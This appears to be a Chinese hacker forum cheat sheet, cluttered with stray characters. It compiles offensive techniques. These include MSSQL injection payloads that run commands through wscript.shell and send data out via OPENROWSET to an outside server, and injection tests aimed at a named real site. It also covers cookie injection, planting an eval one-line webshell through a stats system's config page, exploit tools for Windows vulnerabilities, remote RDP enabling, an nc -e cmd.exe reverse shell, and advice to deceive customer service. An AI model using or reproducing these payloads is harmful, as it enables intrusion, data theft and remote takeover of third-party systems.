SA点数据库分离技术相关) J& {+ A9 P3 @* |1 c
+ ~4 e8 K( L! \9 N, I9 S0 h9 q
" X6 p) q5 l% pSA点数据库分离搞法+语句:
9 F' g, c8 E' C. `. m& P* L# W. O! @% _
注射点不显错,执行下面三条语句页面都返回正常。
) n9 `( P5 _+ {% [4 fand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')% Y2 k# u2 E w1 g$ k$ w# @; H
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
. {0 W1 F P- {+ G. G( jand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')- Z, M9 B5 J- W2 j
可以列目录,判断系统为2000,web与数据库分离
+ s. r! S) s4 E0 L( C; E- Y0 s4 q& H遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。0 m' x5 l3 o5 s( n
在注射点上执行1 q! C% s7 `' G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
' Q- i3 K0 H! F N9 }% Q& f9 y1 e页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
7 K- Q9 D! u% X8 t! t还有我用NC监听得其他端口都没有得到IP。( U1 U4 K. ~/ K( ^ [; {$ {% m
- C8 U& g1 ~: U' m' Q. Q通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
2 M& u8 l1 g+ g7 g'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
* m n0 V/ @- n" Y' k# ~/ k2 G% D Q7 C/ Y* o# h3 T8 O
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
7 U4 o w- v) O! ~# k
' s: j! v1 i9 Z现在就猜想是不是数据库是内网而且不能连外网。
- P# E4 j4 Y1 s [( |1 W6 ?9 T% X: M5 a: p& z4 v$ A) e1 c
: `: t l! l* r& c: G$ I- jaccess导出txt文本代码
) ~. a) i, ?) K+ T' YSELECT * into [test.txt] in 'd:\web\' 'text;' from admin1 i: c1 v9 j/ P/ w) W
, R6 S3 B$ U" c- C8 [. o+ F7 R
% ^) k; S, ?! w/ ~& }
8 Z* F/ u- e; n9 G# m& r E自动跳转到指定网站代码头5 o* d$ G. x' B: q. G9 z
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>4 @, O6 n o- k$ X: u/ T+ g J! N0 e
* g; |2 T' `& x7 t
% r9 v/ q' h4 O入侵java or jsp站点时默认配置文件路径:% u0 P& i5 e# s$ c# ^
\web-inf\web.xml
- r4 r- U! }6 @* o, |$ Z* `5 ^% ^tomcat下的配置文件位置:
' X9 d" w u2 W( U" J O: f9 o& v v\conf\server.xml (前面加上tomcat路径)% X8 T9 g) N0 E& ^; P7 I
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
4 i% J8 p5 f7 x/ u( _0 I1 |1 E/ i8 p6 J; l" Z, ]5 J' b
! E( r2 {8 h# B1 F; c
! n2 _1 H% P, X
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:6 u/ x4 Z3 _' G
-1%23
, \* |1 ^( e6 d) O" ^) B R>
7 p) e6 p; |$ W+ o% h<
' |, }! c; D1 X, r J7 e# H1'+or+'1'='1" Y2 H2 v/ R7 F% @' V0 A! s9 y
id=8%bf h: s- i' P* ]: `
. y0 P2 W0 ]. ]$ i! T# {& T8 c) P! L全新注入点检测试法:8 g7 l. N2 r! ?3 R! x; U% P0 i
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
* U2 T) o+ _- R+ Y& u4 L6 R- s+ H: O- l1 o4 R3 i N/ e: M
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。, q, `' X* ~# j; t; V
) C0 i- o5 Y, A y) O" i: B/ O& @搜索型注入判断方法:! m% f' Q3 [6 p0 K5 d
北京%' and '1'='1' and '%'='
: z& ~& _: U0 u1 N P( z) j9 i北京%' and '1'='2' and '%'='
+ h8 }7 M2 Z: G2 p/ R, ^0 N( O! w3 {2 F( c8 Y- B# b% L* P
7 s. r, Q9 J* DCOOKIES注入: }6 q) L5 I, e$ H. [
7 Y2 \9 F4 r, M0 p- Sjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
; A2 `" n3 d8 @: i, J, p. I8 y
' `- k+ y' z& U4 p0 P8 G; D; t& m2000专业版查看本地登录用户命令:
9 C) x4 x) q& [) i6 O, x% I' Dnet config workstation f S9 M+ R$ U1 [( O/ C9 G
8 `# b1 ^8 S# B, Y
5 b$ T4 p8 @. k2 p# r; y& K2 H4 \- ~2003下查看ipsec配置和默认防火墙配置命令:
& K& P5 x+ u) gnetsh firewall show config8 ?! r5 C% Y# {- k+ D( V ?
netsh ipsec static show all. ~6 }4 y1 |; L$ B
6 K; z. K& d: V5 I% t5 X不指派指定策略命令:
# d& @9 `9 h: f) Unetsh ipsec static set policy name=test assign=n (test是不指派的策略名)- }: v* `& H ~9 x) r: F4 C) {
netsh ipsec static show policy all 显示策略名
( F( h' M1 f. S% S3 X+ ]
% f+ m: d( e: }' f( r V. [. d% }
5 C0 V: N2 }# m1 {/ E( M" D1 ~猜管理员后台小技巧:
' n! ^" D9 t' [5 N* ]admin/left.asp
, H# q% }; I( R9 j) eadmin/main.asp& D2 B1 E0 p8 L) E! f. Y
admin/top.asp
5 K. h+ `3 }7 z D. yadmin/admin.asp # p* |, \/ _8 ^ Y( N! p) ]% U. G
会现出菜单导航,然后迅雷下载全部链接
" \* T9 |4 T0 }- O' l$ K( K9 P! y0 ~4 P g/ ^
* b6 D2 o/ k: u: J* c4 ^
社会工程学:
% H @9 { `( R3 Q- ?2 J5 V' P用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
2 \8 A* W9 N" V然后去骗客服
. h: J% V& w( B9 n4 h1 F, B- ^- j$ B
9 @3 Q) z7 p+ Q! _/ x) ^统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: , `" q/ \: k2 Q- U6 q) C" u9 ~' s7 k
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
1 b; A7 J) m/ [% l6 l- C 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。8 H/ ^9 _7 e( i; d$ ?/ o' J& ?
! i1 d9 J0 }& S1 o4 m
9 Q! Z/ ~# Q! F8 f
, z% p3 b" g# D( R( d* j5 v$ u6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
# x3 l( h; J( C p$ F( p: N, B+ R5 X; Y% n
# @5 g: G* K5 Q/ \5 a' L: o* y; ]8 C- n2 h& ]& C
CMD加密注册表位置$ r; Q3 N9 \( L# \ ^
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor+ S. L7 U1 h7 c4 r" t( b9 M
AutoRun
1 p! `! X% `0 N" r9 p- x3 l1 r3 j. L6 H% w$ D
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor* k$ f, h; f% h8 a( d7 u- P
AutoRun# r' `/ z) U+ S) j4 T# }
) I" ]$ s9 E& @) p1 F* \
3 V" O# L. R! P
在找注入时搜索Hidden,把他改成test! p7 y- c r; v! Q% T
' l( C6 q X# a0 b9 i
6 h) e; G. z7 t& z( {5 w0 \* s+ l$ ?% H$ M. k" L
mstsc /v:IP /console 9 o/ x% f7 O, C) r6 D5 p. b8 P
; Y' l4 x9 ]3 `( o6 \+ R
; L: t# Q2 E+ P$ Z- e- P, M一句话开3389:# ^0 {! P: P* F# O' {
! ?6 l& G5 {3 L! O2 E' q最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
4 f2 d% d+ M9 u开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
- s: H. c# z! w. c
1 @) ?7 G# ~% t! ?" j" A8 p3 |/ I' j# p: v+ U4 e
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:/ k. p9 K& H4 `5 w7 v1 c3 x
Insert into admin(user,pwd) values('test','test')( M: v: x. B3 o1 ^3 k; r3 h
% l) {9 p6 K+ G" t2 r
. Y6 c4 Y# Q9 k9 E# t( \
NC反弹
: {; [* r( M4 l5 F. K先在本机执行: nc -vv -lp 监听的端口 (自己执行) ( x5 Z$ n# |# W' l& X5 q% B
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)7 ^6 C/ x! L+ v+ u
) j$ r. A; t j7 a: o/ v# p9 g7 n! S" U0 c
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
) k8 b) K/ K# O1 t) J3 ], p2 Y
/ r& R; D- U9 ^: f1 A有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
( J% m+ A4 `$ A' K2 ]" C例如: a8 `0 A( U) ~2 u) ~
subst k: d:\www\ 用d盘www目录替代k盘* F/ Z6 A" }0 u# f
subst k: /d 解除K盘代替 |